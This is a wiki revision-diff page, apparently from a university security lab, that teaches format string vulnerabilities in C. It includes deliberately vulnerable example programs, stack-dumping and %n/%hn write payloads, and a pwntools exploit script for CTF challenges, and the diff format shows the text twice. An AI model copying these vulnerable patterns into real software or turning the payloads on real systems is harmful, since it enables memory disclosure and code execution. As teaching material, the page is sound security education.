Difference between revisions of "Format String Bug Introduction"

From Embedded Lab Vienna for IoT & Security
Jump to navigation Jump to search
 
(18 intermediate revisions by the same user not shown)
Line 1: Line 1:
bb== Description of Format String Vulnerability ==
== Summary ==
 
This document gives an introduction into format string bugs. The Format String Bug occurs when the programmer passes user controlled buffer to the Format Function. Then user input data is evaluated as a command by the application. An exploit can read from the stack and perform arbitrary write on the stack and therefore change the program behavior. This can lead to program crashes (segmentation faults) and security compromise such as reveal of secrets in memory (information disclosure) or execute arbitrary commands.
 
 
== Requirements ==
Binaries are tested on platform:  Debian 4.9.210-1 (2020-01-20)
 
  git clone https://git.fh-campuswien.ac.at/CampusCyberSecurityTeam/ccst
  cd ccst/format_string
 
All here discussed code examples can be found in the example folder. They are compiled in 32 bit architecture x86 using gcc version 6.3.0 (posix).
 
  gcc example -m32 -o example
 
Exploits for x64 architecture may differ
 
== Description of Format String Vulnerability ==
The '''Bold text'''Format function in ANSI C conversion function such as `printf`, which converts a variable into a human-readable string representation.
The '''Bold text'''Format function in ANSI C conversion function such as `printf`, which converts a variable into a human-readable string representation.
The '''Format String''' is the argument of the Format Function, it contains an ASCII string with text and Format Parameter, such as:
The '''Format String''' is the argument of the Format Function, it contains an ASCII string with text and Format Parameter, such as:
Line 8: Line 25:
The '''Format Parameter/Specifier''' <code>%d,%s,%p,%u,..</code> defines the type of conversion function.
The '''Format Parameter/Specifier''' <code>%d,%s,%p,%u,..</code> defines the type of conversion function.


=== Format Parameter/Specifier Table ===
==== Format Parameter/Specifier Table ====
{| class="wikitable"
{| class="wikitable"
|-
|-
Line 32: Line 49:
In vulnerable code the user input is directly passed to the function <code>printf(userinput)</code> instead of a Format String including Format Parameter.
In vulnerable code the user input is directly passed to the function <code>printf(userinput)</code> instead of a Format String including Format Parameter.


=== Vulnerable Format Functions Table ===
==== Vulnerable Format Functions Table ====
{|class="wikitable"
{|class="wikitable"
|-
|-
Line 55: Line 72:
|}
|}


=== History ===
==== History ====
The Format String Bug is publicly known since at least September 1999<ref name="proftpd" />, it has obtained major attention after public release of the exploit code anainst wu-ftpd 2.6.0 in June 2000<ref name="wuftpd" />.
The Format String Bug is publicly known since at least September 1999<ref name="proftpd" />, it has obtained major attention after public release of the exploit code anainst wu-ftpd 2.6.0 in June 2000<ref name="wuftpd" />.


=== Example - Read from the stack ===
===Read From the Stack===
Shows safe and vulnerable usage of Format function
==== Example - Read from the stack ====
Shows safe and vulnerable usage of Format Function
 


     #include  <stdio.h>
     #include  <stdio.h>
     void main(int argc, char **argv)
     void main(int argc, char **argv)
     {
     {
// This line is safe
        // This line is safe
         printf("%s\n", argv[1]);
         printf("%s\n", argv[1]);
   
        // This line is vulnerable
        printf(argv[1]);
    }


// This line is vulnerable
printf(argv[1]);
    }


Execute with different arguments:
Execute with different arguments:
Line 79: Line 99:
The Format Function interprets the passed command line arguments as formatted string with 15 pointer arguments. As a further specification is missing it will print the next 15 pointer from the stack, which means we are able to dump the stack.
The Format Function interprets the passed command line arguments as formatted string with 15 pointer arguments. As a further specification is missing it will print the next 15 pointer from the stack, which means we are able to dump the stack.


=== What happens exactly? ===
==== What happens exactly? ====


* Stack with correctly coded Format string
* '''Stack with correctly coded Format String'''
<code>printf(“this is a %s, with a number %d, and address %08x”,a,b,&c);</code>
<code>printf(“this is a %s, with a number %d, and address %08x”,a,b,&c);</code>
The stack grows to the lower addresses and is used in a LIFO manner, the arguments are pushed in reverse order on the stack. The Format Function will pop a, b, c variables and convert them into the string which is sent to stdout.
The stack grows to the lower addresses and is used in a LIFO manner, the arguments are pushed in reverse order on the stack. The Format Function will pop a, b, c variables and convert them into the string which is sent to stdout.(Source of image: <ref name="exptut" />)


(https://i.imgur.com/iVsbFmq.png)
[[File:Safe.png]]


* Stack with missing variables
* '''Stack with missing variables'''
<code>printf(userinput)</code> with an input string <code>“this is a %s, with a number %d, and address %08x”</code> evaluates to
<code>printf(userinput)</code> with an input string <code>“this is a %s, with a number %d, and address %08x”</code> evaluates to
<code>printf(“this is a %s, with a number %d, and address %08x”);</code>
<code>printf(“this is a %s, with a number %d, and address %08x”);</code>
The variables a,b,&c are missing on the stack.
The variables a,b,&c are missing on the stack.(Source of image: <ref name="exptut" />)
![](https://i.imgur.com/0elA6pt.png)
    The Format Function pops the next values from the stack even when they have not been declared.


If the source code is available a Format String vulnerability can be recognized by checking all Format Functions, if the string including Format Specifier are correctly provided. In case of a binary test by simply inserting Format Specifiers `"%x %x %s"`as input.
[[File:Vulnstack.png]]


The Format Function pops the next values from the stack even when they have not been declared.
If the source code is available a Format String vulnerability can be recognized by checking all Format Functions, if the string including Format Specifier are correctly provided. In case of a binary test by simply inserting Format Specifiers <code>"%x %x %s"</code> as input.


### Arbitrary Read
==== Read by Direct Stack Parameter Access ====


example2.c
File example2.c
```C
# include  <stdio.h>
# include <string.h>


    # include  <stdio.h>
    # include <string.h>
   
    void vuln() {
        printf("What's your name? ");
        char name[200];
        gets(name);
        printf("Nice to meet you, ");
        printf(strcat(name, "!\n"));
    }


void vuln() {
    void main(int argc, char **argv)
printf("What's your name? ");
    {
char name[200];
        setvbuf(stdin, NULL, _IONBF, 0);
gets(name);
        setvbuf(stdout, NULL, _IONBF, 0);
printf("Nice to meet you, ");
        vuln();
printf(strcat(name, "!\n"));
    }


}
We can read arbitrary from the stack by <code>"%<some number>$x"</code>, so to read the first argument on the stack we use <code>%1$08x</code> for the second <code>%2$08x</code>...
To get an idea where we are reading, we can use a method of inserting
 
    "AAAA.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x"
   
    ./example2
    What's your name? AAAA.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x
    Nice to meet you, 
    AAAA.5655f000.00000001.5655d64d.ffd4fbb8.f77595f0.f75bf00b.41414141.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78!


void main(int argc, char **argv)
then we are able to determine the number of the input buffer on the stack where <code>41414141</code> is found. So the input buffer name is the 6th argument on the stack, which can be accessed by <code>AAAA.%6$08x</code>
{
'''Caution''' - data on the stack is represented in little Endian on Unix machines. Test this by inserting
setvbuf(stdin, NULL, _IONBF, 0);
setvbuf(stdout, NULL, _IONBF, 0);
vuln();


}
    ABCD.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x
```
   
We can read arbitrary from the stack by `"%<some number>$x"`, so to read the first argument on the stack we use `%1$08x` for the second `%2$08x`...
    ./example2
    What's your name? ABCD.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x
    Nice to meet you, ABCD.f18281a0.0000004f.ffffffaf.85571440.00000012.44434241.30252e78.2e783830.3830252e.252e7838.78383025.30252e78.2e783830.3830252e.252e7838!


To get an idea where we are reading, we can use a method of inserting
The Format string with our input <code>ABCD...</code> can be found at the stack beginning with the 6th argument <code>44434241</code> in little Endian and can verified by <code>ABCD.%6$08x</code>.
```bash
"AAAA.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x"


./example2
==== Arbitrary Read ====
What's your name? AAAA.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x
We like to read data in memory from an known address. The examples before showed the content of the Format String on the stack is controlled by us.
Nice to meet you, AAAA.5655f000.00000001.5655d64d.ffd4fbb8.f77595f0.f75bf00b.41414141.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78!
Then we need a Format Parameter which uses an address from the stack (per reference) and displays the memory from there <code>%s</code>.
```
Now we insert the address which we like to read and define that the 6th item on the stack should be read as string at the pointer address passed by reference with <code>%s</code>.
then we are able to determine the number of the input buffer on the stack where `41414141` is found. So the input buffer name is the 6th argument on the stack, which can be accessed by `AAAA.%6$08x`
**Caution** - data on the stack is represented in little Endian on Unix machines. Test this by inserting
```bash
ABCD.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x


./example2
    address = 0x08480110
What's your name? ABCD.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x
    address (encoded as 32 bit le string): "\x10\x01\x48\x08"
Nice to meet you, ABCD.f18281a0.0000004f.ffffffaf.85571440.00000012.44434241.30252e78.2e783830.3830252e.252e7838.78383025.30252e78.2e783830.3830252e.252e7838!
    printf ("\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|");


```
The Format string with our input `ABCD...` can be found at the stack beginning with the 6th argument `44434241` in little Endian and can verified by `ABCD.%6$08x`.


### Arbitrary Read
(With this information you should be able to solve CH0_easyprintf)
We like to read data in memory from an known address. The examples before showed the content of the Format String on the stack is controlled by us.
Then we need a Format Parameter which uses an address from the stack (per reference) and displays the memory from there `%s`.
Now we insert the address which we like to read and define that the 6th item on the stack should be read as string at the pointer address passed by reference with `%s`.
```C
address = 0x08480110
address (encoded as 32 bit le string): "\x10\x01\x48\x08"
printf ("\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|");
```


### Test your skills with CH0_easyprintf
=== Write the Stack ===


### Write the Stack %n
==== Write with %n ====


The `%n` Format Parameter writes the number of bytes already printed into a variable. The address of the variable is given to the format function by placing an integer pointer as parameter onto the stack.
The <code>%n</code> Format Parameter writes the number of bytes already printed into a variable. The address of the variable is given to the format function by placing an integer pointer as parameter onto the stack.
File: example3
File: example3
```C
int n_chars = 0;
printf("Hello, World%n is ", &n_chars);
printf("%d bytes long.\n",n_chars);
```
In the first printf call with %n Format Parameter in example3 the number of 12 bytes of `Hello, World` are written into the variable `n_chars`.


`%n` can be used to write into an specified address
    int n_chars = 0;
```bash
    printf("Hello, World%n is ", &n_chars);
\xc0\xc8\xff\xbf_%08x.%08x.%08x.%08x.%08x.%n"
    printf("%d bytes long.\n",n_chars);
```
 
In the first printf call with %n Format Parameter in example3 the number of 12 bytes of <code>Hello, World</code> are written into the variable <code>`n_chars`</code>.
 
<code>%n</code> can be used to write into an specified address
 
    \xc0\xc8\xff\xbf_%08x.%08x.%08x.%08x.%08x.%n"
 


The next printf calls show how the value of n_chars can be controlled by inserting a number of bytes for alignment.
The next printf calls show how the value of n_chars can be controlled by inserting a number of bytes for alignment.
```C
 
n_chars = 0;
    n_chars = 0;
printf("%10u%n  ", 1, &n_chars);        //n_chars=10
    printf("%10u%n  ", 1, &n_chars);        //n_chars=10
n_chars = 0;
    n_chars = 0;
printf("%150u%n  ", 2, &n_chars);        //n_chars=150
    printf("%150u%n  ", 2, &n_chars);        //n_chars=150
```
 
But addresses in memory are at least 4 bytes long and we do not like to overwrite these areas on the stack. Therefore techniques to write just a byte are used several times.
But addresses in memory are at least 4 bytes long and we do not like to overwrite these areas on the stack. Therefore techniques to write just a byte are used several times.
Let us have a closer look what is happening, because writing just one byte may have some side effects. An unsigned integer in memory is stored in 4 bytes in Little Endian encoding, therefore a number like 0x0000014c is \x4c\x01\x00\x00 in memory.
Let us have a closer look what is happening, because writing just one byte may have some side effects. An unsigned integer in memory is stored in 4 bytes in Little Endian encoding, therefore a number like <code>0x0000014c</code> is <code>\x4c\x01\x00\x00</code> in memory.
File: example4
File: example4
```C
unsigned char  canary[5];
unsigned char  foo[4];
memset (foo, "\x00", sizeof (foo));
/* 0 * before */ strcpy (canary, "AAAA");
/* 1 */  printf ("%16u%n", 7350, (int *) &foo[0]);            //foo[0]=0x10
/* 2 */  printf ("%32u%n", 7350, (int *) &foo[1]);            //foo[1]=0x20
/* 3 */  printf ("%64u%n", 7350, (int *) &foo[2]);            //foo[3]=0x40
/* 4 */  printf ("%128u%n", 7350, (int *) &foo[3]);          //foo[3]=0x80
/* 5 * after */ printf ("%02x%02x%02x%02x\n", foo[0], foo[1],
foo[2], foo[3]);
printf ("canary: %02x%02x%02x%02x\n", canary[0],
canary[1], canary[2], canary[3]);
```
In step 0 foo is initialized with 4 times `\x00` bytes and in the next variable on the stack a canary is stored with 'AAAA' presented by `\x41\x41\x41\x41`. After the execution of the 4 steps bytewise write operation foo contains 10204080 as expected, but 3 bytes of the canary got overwritten `\x00\x00\x00\x41`= 00000041.. Figure 1 illustrates the behavior of the write procedures.


![](https://i.imgur.com/dFhNHgl.png)
    unsigned char  canary[5];
    unsigned char  foo[4];
    memset (foo, "\x00", sizeof (foo));
    /* 0 * before */ strcpy (canary, "AAAA");
    /* 1 */  printf ("%16u%n", 7350, (int *) &foo[0]);            //foo[0]=0x10
    /* 2 */  printf ("%32u%n", 7350, (int *) &foo[1]);            //foo[1]=0x20
    /* 3 */  printf ("%64u%n", 7350, (int *) &foo[2]);            //foo[3]=0x40
    /* 4 */  printf ("%128u%n", 7350, (int *) &foo[3]);          //foo[3]=0x80
    /* 5 * after */ printf ("%02x%02x%02x%02x\n", foo[0], foo[1],foo[2], foo[3]);
    printf ("canary: %02x%02x%02x%02x\n", canary[0],canary[1], canary[2], canary[3]);
 
In step 0 foo is initialized with 4 times <code>\x00</code> bytes and in the next variable on the stack a canary is stored with <code>AAAA</code> presented by <code>\x41\x41\x41\x41</code>. After the execution of the 4 steps bytewise write operation foo contains 10204080 as expected, but 3 bytes of the canary got overwritten <code>\x00\x00\x00\x41</code>= 00000041. The next Figure illustrates this behavior of the write procedures.(Image source:<ref name="expfor"/>)
 
[[File:Write.png]]


Multiple byte writes at once can also be performed, when the written bytes are ordered.
Multiple byte writes at once can also be performed, when the written bytes are ordered.
File: example4
File: example4
```C
 
strcpy (canary, "AAAA");
    strcpy (canary, "AAAA");
printf ("%16u%n%16u%n%32u%n%64u%n",
    printf ("%16u%n%16u%n%32u%n%64u%n",1, (int *) &foo[0], 1, (int *) &foo[1],1, (int *) &foo[2], 1, (int *) &foo[3]);
1, (int *) &foo[0], 1, (int *) &foo[1],
    printf ("%02x%02x%02x%02x\n", foo[0], foo[1],foo[2], foo[3]);
1, (int *) &foo[2], 1, (int *) &foo[3]);
    printf ("canary: %02x%02x%02x%02x\n", canary[0], canary[1], canary[2], canary[3]);
printf ("%02x%02x%02x%02x\n", foo[0], foo[1],
 
foo[2], foo[3]);
printf ("canary: %02x%02x%02x%02x\n", canary[0],
canary[1], canary[2], canary[3]);
```
Output again foo: 10204080 and canary: 00000041.
Output again foo: 10204080 and canary: 00000041.


### Write Short %hn
==== Write Short %hn ====


Instead of writing each byte we can use a technique to write short integers using `%hn` format specifier. The advantage of using `%hn` is that it does not destroy data near the targeted address. Therefore this is the  preferred  method.
Instead of writing each byte we can use a technique to write short integers using <code>%hn</code> format specifier. The advantage of using <code>%hn</code> is that it does not destroy data near the targeted address. Therefore this is the  preferred  method.
Again we like to write 10204080 into foo.
Again we like to write 10204080 into foo.
First value of alignment: 0x2040=8208
First value of alignment: 0x2040=8208
Second value of alignment: 0x8040-0x2040=32832-8208=24624
Second value of alignment: 0x8040-0x2040=32832-8208=24624


example5
Source: example5
```
 
printf ("%.8208u%hn%.24624u%hn",
    printf ("%.8208u%hn%.24624u%hn",1, (short int *) &foo[0], 1, (short int *) &foo[2]);
1, (short int *) &foo[0],
 
1, (short int *) &foo[2]);
```
Output: foo: 10204080 canary: 41414141
Output: foo: 10204080 canary: 41414141
Writing short values enables an exploitation of the Format String Bug  without overwriting nearby memory locations.


To overwrite an address of 4 bytes we just need two writing steps, be aware of the correct parameter passing.


### Test your skills with CH1_root_me2
'''Write Short Example:''' Given a binary with a Format String vulnerability vuln. We like to overwrite a variable <code>test</code> on the stack with the known address of <code>test_addr=0xffeeecac</code> and set it to <code>test=0x1337babe</code>. The input buffer used in the printf function is the 6th element on the stack.
A Python script for exploitation string <code>p32(addr)+p32(addr+2)+'%'+str(first)+'x%6$hn'+%'+ str(second)'+x%7$hn</code> looks like


    from pwn import *
    p = process('./vuln')
   
    test_addr=0xffeeecac
    payload=''
    payload+=p32(test_addr)
    payload+=p32(test_addr+2)
    first=0xbabe-len(payload)
    payload+='%'+str(first)+'x%6$hn'
    second+=0x1337-first-8
    payload+='%'+str(second)+'x%7$hn'
    p.sendline(payload)
    p.interactive()


### Usage
(Now you should be able to solve the challenge CH1_root_me2 and CH2_printfun)
 
 
=== Usage ===
* Reading arbitrary locations (leak addresses or canaries)
* Reading arbitrary locations (leak addresses or canaries)
* Writing arbitrary locations
* Writing arbitrary locations
Line 240: Line 269:




## Protection
== Protection ==
* Programmer should use safe versions
* Programmer should use safe versions
Never pass user input directly to Format Function without format specifier.
Never pass user input directly to Format Function without format specifier.<ref name="sins" />
```
 
prinftf("%s",userinputbuffer)
    prinftf("%s",userinputbuffer)
snprintf(buf, sizeof buf, "%s", userinputbuffer);
    snprintf(buf, sizeof buf, "%s", userinputbuffer);
```
 
* FormatGuard: Automatic Protection From printf Format String Vulnerabilities [3]
* FormatGuard: Automatic Protection From printf Format String Vulnerabilities <ref name="formatguard" />
 
== Courses ==
 
* [[Campus Cyber Security Team]] (05-15-2020)




Line 256: Line 289:
* http://codearcana.com/posts/2013/05/02/introduction-to-format-string-exploits.html
* http://codearcana.com/posts/2013/05/02/introduction-to-format-string-exploits.html


## Interesting CTF writeups
=== Interesting CTF writeups ===
* Use format string bug to leak canary and system addresses https://naivenom.tistory.com/19
* Use format string bug to leak canary and system addresses https://naivenom.tistory.com/19
* https://github.com/yuvaly0/CTFs/blob/master/2020_tamu/B64DECODER_DONE/B64DECODER.md
* https://github.com/yuvaly0/CTFs/blob/master/2020_tamu/B64DECODER_DONE/B64DECODER.md
Line 262: Line 295:
== References==
== References==
<references>
<references>
<ref name="expfor">scut / team teso, ''Exploiting Format String Vulnerabilities'', version 1.2,09-01-b2001, http://repository.root-me.org/Exploitation%20-%20Syst%C3%A8me/Unix/EN%20-%20Format%20Bugs%20-%20Exploiting%20format%20string.pdf[accessed 05-21-2020]</ref>
<ref name="exptut">Saif El Sherei, ''Format String Exploitation-Tutorial'', https://www.exploit-db.com/docs/english/28476-linux-format-string-exploitation.pdf[accessed 05-21-2020].</ref>
<ref name="proftpd">Tymm Twillman,''Exploit for proftpd 1.2.0pre6'', BugTraq, 20-09-1999, https://seclists.org/bugtraq/1999/Sep/328 [accessed 05-21-2020].</ref>
<ref name="proftpd">Tymm Twillman,''Exploit for proftpd 1.2.0pre6'', BugTraq, 20-09-1999, https://seclists.org/bugtraq/1999/Sep/328 [accessed 05-21-2020].</ref>
<ref name="wuftpd"> tf8, ''WuFTPD: Providing *remote* root since at least 1994'', BugTraq, 22-06-2000, https://seclists.org/bugtraq/2000/Jun/297 [accessed 05-21-2020].</ref>
<ref name="wuftpd"> tf8, ''WuFTPD: Providing *remote* root since at least 1994'', BugTraq, 22-06-2000, https://seclists.org/bugtraq/2000/Jun/297 [accessed 05-21-2020].</ref>
Line 268: Line 303:
</references>
</references>


[[Category:Basics]]
[[Category:Basic]]

Latest revision as of 14:33, 19 May 2020

Summary

This document gives an introduction into format string bugs. The Format String Bug occurs when the programmer passes user controlled buffer to the Format Function. Then user input data is evaluated as a command by the application. An exploit can read from the stack and perform arbitrary write on the stack and therefore change the program behavior. This can lead to program crashes (segmentation faults) and security compromise such as reveal of secrets in memory (information disclosure) or execute arbitrary commands.


Requirements

Binaries are tested on platform: Debian 4.9.210-1 (2020-01-20)

 git clone https://git.fh-campuswien.ac.at/CampusCyberSecurityTeam/ccst
 cd ccst/format_string

All here discussed code examples can be found in the example folder. They are compiled in 32 bit architecture x86 using gcc version 6.3.0 (posix).

 gcc example -m32 -o example

Exploits for x64 architecture may differ

Description of Format String Vulnerability

The Bold textFormat function in ANSI C conversion function such as `printf`, which converts a variable into a human-readable string representation. The Format String is the argument of the Format Function, it contains an ASCII string with text and Format Parameter, such as:

 printf (“Guess solution: %d\n”, 42);

Here 42 is interpreted as a decimal number by the Format Function. The Format Parameter/Specifier %d,%s,%p,%u,.. defines the type of conversion function.

Format Parameter/Specifier Table

Parameters Output Passed as
%p External representation of a pointer to void Reference
%d Decimal Value
%c Character Value
%u Unsigned decimal Value
%x Hexadecimal Value
%s String Reference
%n Writes the number of characters into a pointer Reference

In vulnerable code the user input is directly passed to the function printf(userinput) instead of a Format String including Format Parameter.

Vulnerable Format Functions Table

Format function Description
fprint Writes the printf to a file
printf Output a formatted string
sprintf Prints into a string
snprintf Prints into a string checking the length
vfprintf Prints the a va_arg structure to a file
vprintf Prints the va_arg structure to stdout
vsprintf Prints the va_arg to a string
vsnprintf Prints the va_arg to a string checking the length

History

The Format String Bug is publicly known since at least September 1999[1], it has obtained major attention after public release of the exploit code anainst wu-ftpd 2.6.0 in June 2000[2].

Read From the Stack

Example - Read from the stack

Shows safe and vulnerable usage of Format Function


   #include  <stdio.h>
   void main(int argc, char **argv)
   {
       // This line is safe
       printf("%s\n", argv[1]);
   
       // This line is vulnerable
       printf(argv[1]);
   }


Execute with different arguments:

   ./example "%p %p %p %p %p %p %p %p %p %p %p %p %p %p %p"
   ./example "%08x.%08x.%08x.%08x.%08x%08x.%08x.%08x.%08x.%08x"
   ./example "%s"

The Format Function interprets the passed command line arguments as formatted string with 15 pointer arguments. As a further specification is missing it will print the next 15 pointer from the stack, which means we are able to dump the stack.

What happens exactly?

  • Stack with correctly coded Format String

printf(“this is a %s, with a number %d, and address %08x”,a,b,&c); The stack grows to the lower addresses and is used in a LIFO manner, the arguments are pushed in reverse order on the stack. The Format Function will pop a, b, c variables and convert them into the string which is sent to stdout.(Source of image: [3])

Safe.png

  • Stack with missing variables

printf(userinput) with an input string “this is a %s, with a number %d, and address %08x” evaluates to printf(“this is a %s, with a number %d, and address %08x”); The variables a,b,&c are missing on the stack.(Source of image: [3])

Vulnstack.png

The Format Function pops the next values from the stack even when they have not been declared. If the source code is available a Format String vulnerability can be recognized by checking all Format Functions, if the string including Format Specifier are correctly provided. In case of a binary test by simply inserting Format Specifiers "%x %x %s" as input.

Read by Direct Stack Parameter Access

File example2.c

   # include  <stdio.h>
   # include <string.h>
   
   void vuln() {
       printf("What's your name? ");
       char name[200];
       gets(name);
       printf("Nice to meet you, ");
       printf(strcat(name, "!\n"));
   }
   void main(int argc, char **argv)
   {
       setvbuf(stdin, NULL, _IONBF, 0);
       setvbuf(stdout, NULL, _IONBF, 0);
       vuln();
   }

We can read arbitrary from the stack by "%<some number>$x", so to read the first argument on the stack we use %1$08x for the second %2$08x... To get an idea where we are reading, we can use a method of inserting

   "AAAA.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x"
   
   ./example2
   What's your name? AAAA.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x
   Nice to meet you,   
   AAAA.5655f000.00000001.5655d64d.ffd4fbb8.f77595f0.f75bf00b.41414141.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78!

then we are able to determine the number of the input buffer on the stack where 41414141 is found. So the input buffer name is the 6th argument on the stack, which can be accessed by AAAA.%6$08x Caution - data on the stack is represented in little Endian on Unix machines. Test this by inserting

   ABCD.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x
   
   ./example2
   What's your name? ABCD.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x
   Nice to meet you, ABCD.f18281a0.0000004f.ffffffaf.85571440.00000012.44434241.30252e78.2e783830.3830252e.252e7838.78383025.30252e78.2e783830.3830252e.252e7838!

The Format string with our input ABCD... can be found at the stack beginning with the 6th argument 44434241 in little Endian and can verified by ABCD.%6$08x.

Arbitrary Read

We like to read data in memory from an known address. The examples before showed the content of the Format String on the stack is controlled by us. Then we need a Format Parameter which uses an address from the stack (per reference) and displays the memory from there %s. Now we insert the address which we like to read and define that the 6th item on the stack should be read as string at the pointer address passed by reference with %s.

   address = 0x08480110
   address (encoded as 32 bit le string): "\x10\x01\x48\x08"
   printf ("\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|");


(With this information you should be able to solve CH0_easyprintf)

Write the Stack

Write with %n

The %n Format Parameter writes the number of bytes already printed into a variable. The address of the variable is given to the format function by placing an integer pointer as parameter onto the stack. File: example3

   int n_chars = 0;
   printf("Hello, World%n is ", &n_chars);
   printf("%d bytes long.\n",n_chars);

In the first printf call with %n Format Parameter in example3 the number of 12 bytes of Hello, World are written into the variable `n_chars`.

%n can be used to write into an specified address

   \xc0\xc8\xff\xbf_%08x.%08x.%08x.%08x.%08x.%n"


The next printf calls show how the value of n_chars can be controlled by inserting a number of bytes for alignment.

   n_chars = 0;
   printf("%10u%n   ", 1, &n_chars);        //n_chars=10
   n_chars = 0;
   printf("%150u%n   ", 2, &n_chars);        //n_chars=150

But addresses in memory are at least 4 bytes long and we do not like to overwrite these areas on the stack. Therefore techniques to write just a byte are used several times. Let us have a closer look what is happening, because writing just one byte may have some side effects. An unsigned integer in memory is stored in 4 bytes in Little Endian encoding, therefore a number like 0x0000014c is \x4c\x01\x00\x00 in memory. File: example4

   unsigned char   canary[5];
   unsigned char   foo[4];
   memset (foo, "\x00", sizeof (foo));
   /* 0 * before */ strcpy (canary, "AAAA");
   /* 1 */  printf ("%16u%n", 7350, (int *) &foo[0]);            //foo[0]=0x10
   /* 2 */  printf ("%32u%n", 7350, (int *) &foo[1]);            //foo[1]=0x20
   /* 3 */  printf ("%64u%n", 7350, (int *) &foo[2]);            //foo[3]=0x40
   /* 4 */  printf ("%128u%n", 7350, (int *) &foo[3]);           //foo[3]=0x80
   /* 5 * after */ printf ("%02x%02x%02x%02x\n", foo[0], foo[1],foo[2], foo[3]);
   printf ("canary: %02x%02x%02x%02x\n", canary[0],canary[1], canary[2], canary[3]);

In step 0 foo is initialized with 4 times \x00 bytes and in the next variable on the stack a canary is stored with AAAA presented by \x41\x41\x41\x41. After the execution of the 4 steps bytewise write operation foo contains 10204080 as expected, but 3 bytes of the canary got overwritten \x00\x00\x00\x41= 00000041. The next Figure illustrates this behavior of the write procedures.(Image source:[4])

Write.png

Multiple byte writes at once can also be performed, when the written bytes are ordered. File: example4

   strcpy (canary, "AAAA");
   printf ("%16u%n%16u%n%32u%n%64u%n",1, (int *) &foo[0], 1, (int *) &foo[1],1, (int *) &foo[2], 1, (int *) &foo[3]);
   printf ("%02x%02x%02x%02x\n", foo[0], foo[1],foo[2], foo[3]);
   printf ("canary: %02x%02x%02x%02x\n", canary[0], canary[1], canary[2], canary[3]);

Output again foo: 10204080 and canary: 00000041.

Write Short %hn

Instead of writing each byte we can use a technique to write short integers using %hn format specifier. The advantage of using %hn is that it does not destroy data near the targeted address. Therefore this is the preferred method. Again we like to write 10204080 into foo. First value of alignment: 0x2040=8208 Second value of alignment: 0x8040-0x2040=32832-8208=24624

Source: example5

   printf ("%.8208u%hn%.24624u%hn",1, (short int *) &foo[0], 1, (short int *) &foo[2]);

Output: foo: 10204080 canary: 41414141 Writing short values enables an exploitation of the Format String Bug without overwriting nearby memory locations.

To overwrite an address of 4 bytes we just need two writing steps, be aware of the correct parameter passing.

Write Short Example: Given a binary with a Format String vulnerability vuln. We like to overwrite a variable test on the stack with the known address of test_addr=0xffeeecac and set it to test=0x1337babe. The input buffer used in the printf function is the 6th element on the stack. A Python script for exploitation string p32(addr)+p32(addr+2)+'%'+str(first)+'x%6$hn'+%'+ str(second)'+x%7$hn looks like

   from pwn import *
   p = process('./vuln')
   
   test_addr=0xffeeecac
   payload=
   payload+=p32(test_addr)
   payload+=p32(test_addr+2)
   first=0xbabe-len(payload)
   payload+='%'+str(first)+'x%6$hn'
   second+=0x1337-first-8
   payload+='%'+str(second)+'x%7$hn'
   p.sendline(payload)
   p.interactive()

(Now you should be able to solve the challenge CH1_root_me2 and CH2_printfun)


Usage

  • Reading arbitrary locations (leak addresses or canaries)
  • Writing arbitrary locations
  • Executing arbitrary code (Overwrite Return, .GOT addresses)


Protection

  • Programmer should use safe versions

Never pass user input directly to Format Function without format specifier.[5]

    prinftf("%s",userinputbuffer)
    snprintf(buf, sizeof buf, "%s", userinputbuffer);
  • FormatGuard: Automatic Protection From printf Format String Vulnerabilities [6]

Courses


Sources

Interesting CTF writeups

References

  1. Tymm Twillman,Exploit for proftpd 1.2.0pre6, BugTraq, 20-09-1999, https://seclists.org/bugtraq/1999/Sep/328 [accessed 05-21-2020].
  2. tf8, WuFTPD: Providing *remote* root since at least 1994, BugTraq, 22-06-2000, https://seclists.org/bugtraq/2000/Jun/297 [accessed 05-21-2020].
  3. 3.0 3.1 Saif El Sherei, Format String Exploitation-Tutorial, https://www.exploit-db.com/docs/english/28476-linux-format-string-exploitation.pdf[accessed 05-21-2020].
  4. scut / team teso, Exploiting Format String Vulnerabilities, version 1.2,09-01-b2001, http://repository.root-me.org/Exploitation%20-%20Syst%C3%A8me/Unix/EN%20-%20Format%20Bugs%20-%20Exploiting%20format%20string.pdf[accessed 05-21-2020]
